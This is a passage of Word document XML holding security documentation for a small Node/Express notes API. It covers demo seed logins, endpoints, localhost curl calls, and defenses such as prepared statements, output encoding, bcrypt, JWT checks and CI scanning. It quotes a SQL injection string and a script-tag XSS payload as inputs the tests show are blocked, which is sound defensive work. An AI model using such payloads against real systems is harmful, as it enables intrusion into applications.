          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| `NODE_ENV` | unset | `production` tightens the JWT secret requirement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Demo accounts created by `npm run seed`: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alice / Alice#2026pass     (role: user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>bob   / Bob#2026password   (role: user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>admin / Admin#2026pass     (role: admin)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API reference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 Method | Path | Auth | Purpose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1 | POST | `/auth/login` | — | authenticate, returns a JWT |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| 2 | GET | `/api/data` | Bearer | returns the caller's notes |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| 3 | POST | `/api/notes` | Bearer | creates a note (own-choice endpoint) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| — | GET | `/api/notes/:id` | Bearer | reads one note, scoped to its owner |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| — | GET | `/health` | — | liveness probe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Login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```json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"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  "token_type": "Bearer",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  "expires_in": 3600,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  "user": { "id": 1, "username": "alice", "role": "user"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Protected data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TOKEN=$(curl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 | node -pe 'JSON.parse(require("fs").readFileSync(0)).token')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-s http://127.0.0.1:3000/api/data -H "Authorization: Bearer $TOKEN"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Without a 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-o /dev/null -w '%{http_code}\n' http://127.0.0.1:3000/api/data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t># 401</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Create a note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http://127.0.0.1:3000/api/notes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-H "Authorization: Bearer $TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">     -d '{"title":"Meeting notes","body":"Rotate the lab passwords."}'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Security measures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4.1 SQL injection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**Every** query is a prepared statement whose SQL text is a constant defined in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>`src/db.js`; only bound parameters vary with the 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findUserByUsername(db, username) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  return db.prepare('SELECT id, username, password_hash, role FROM users WHERE username = ?')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">           .get(username);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There is no string concatenation and no template literal anywhere in the data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>access layer, so a payload such as `admin' OR '1'='1` is compared as a literal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>string and simply fails to match a row.</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test suite asserts that four different injection payloads all return **401**.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4.2 Cross-site scripting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layers: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**Input validation** (`src/security.js`) — usernames must match</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">   `^[A-Za-z0-9_.-]{3,32}$`; note title/body are length-limited and type-checked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">   before they reach the database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>2. **Output encoding** — every user-controlled string passes through</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">   `encodeForOutput()`, which applies HTML entity encoding to all strings in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">   the response object: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note.body = '&lt;script&gt;alert("xss")&lt;/script&gt;'   // stored as-is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>// returned as:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>note.body = '&amp;lt;script&amp;gt;alert(&amp;quot;xss&amp;quot;)&amp;lt;/script&amp;gt;'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Escaping on output (rather than mangling data on input) keeps the stored data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>faithful and stops a payload from executing if a client later injects the value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>into the DOM. The test suite posts a `&lt;script&gt;` payload and asserts the raw tag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>never appears in any response.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4.3 Broken authentication (OWASP A07)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**Password storage.** Passwords are hashed with **bcrypt**, cost factor 10, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>never stored or returned in plaintext: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const hash = bcrypt.hashSync(password, 10);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>const ok   = bcrypt.compareSync(password, hash);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bcrypt is used instead of a plain SHA-256 because it is deliberately slow and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>salted per user, which makes offline guessing and rainbow tables impractical.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**Token issuing.** On success the server signs a JWT with HS256:</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jwt.sign({ sub: String(user.id), username: user.username, role: user.role },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">         secret, { algorithm: 'HS256', expiresIn: '1h', issuer: 'secure-notes-api'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token carries only the subject, username and role — no secrets — because a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>JWT payload is merely base64, not encrypted.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**Middleware verification.** `requireAuth` checks the `Bearer` scheme, verifies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>the signature and the registered claims (`exp`, `iss`) with an **explicit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>algorithm allowlist** (this blocks the `alg: none` and algorithm-confusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>attacks), and then reloads the user from the database so that a token for a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>deleted account stops working immediately.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**Timing and enumeration.** The login route always runs a bcrypt comparison,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>even when the username does not exist, against a dummy hash. Without this, "no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>such user" would return noticeably faster than "wrong password" and leak which</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>accounts exist. The error message is the same for both cases.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**Online guessing.** Five failed attempts per username inside a 15-minute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>window produce `429 Too Many Requests`.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4.4 Other hardening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Measure | Implementation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Security headers | `helmet()` — removes `X-Powered-By`, sets CSP, `X-Content-Type-Options`, frame options |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Body size limit | `express.json({ limit: '10kb' })` — blocks oversized-payload DoS |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| IDOR | notes are always queried with `owner_id = ?`, so another user's note returns 404, not 403 (no existence leak) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Error handling | a single handler returns generic JSON; stack traces and driver messages are never sent to the client |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Secrets | `JWT_SECRET` must come from the environment in production; the process exits if it is missing |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| SQL surface | no dynamic identifiers, no `ORDER BY` interpolation, no `eval`/`Function`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CI/CD pipeline and scan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`.github/workflows/security-ci.yml` runs on **every push and every pull</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>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Stage | Tool | Gate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Test | `npm test` (14 checks) | build fails on any failed check |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| **SAST** | ESLint 9 + `eslint-plugin-security` (14 rules) | build fails on any error |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| **SCA** | `npm audit` | build fails on high/critical in production dependencies |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Reports | `reports/sast-eslint.json`, `reports/sca-npm-audit.json` | uploaded as build artifacts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Current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npx eslint src scripts --format stylish</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problem (0 errors, 1 warning)</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one remaining warning, `security/detect-object-injection`, is a false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>positive: the object keys in `encodeForOutput()` come from our own column</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>names, not from the request. It is suppressed in place with a comment that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
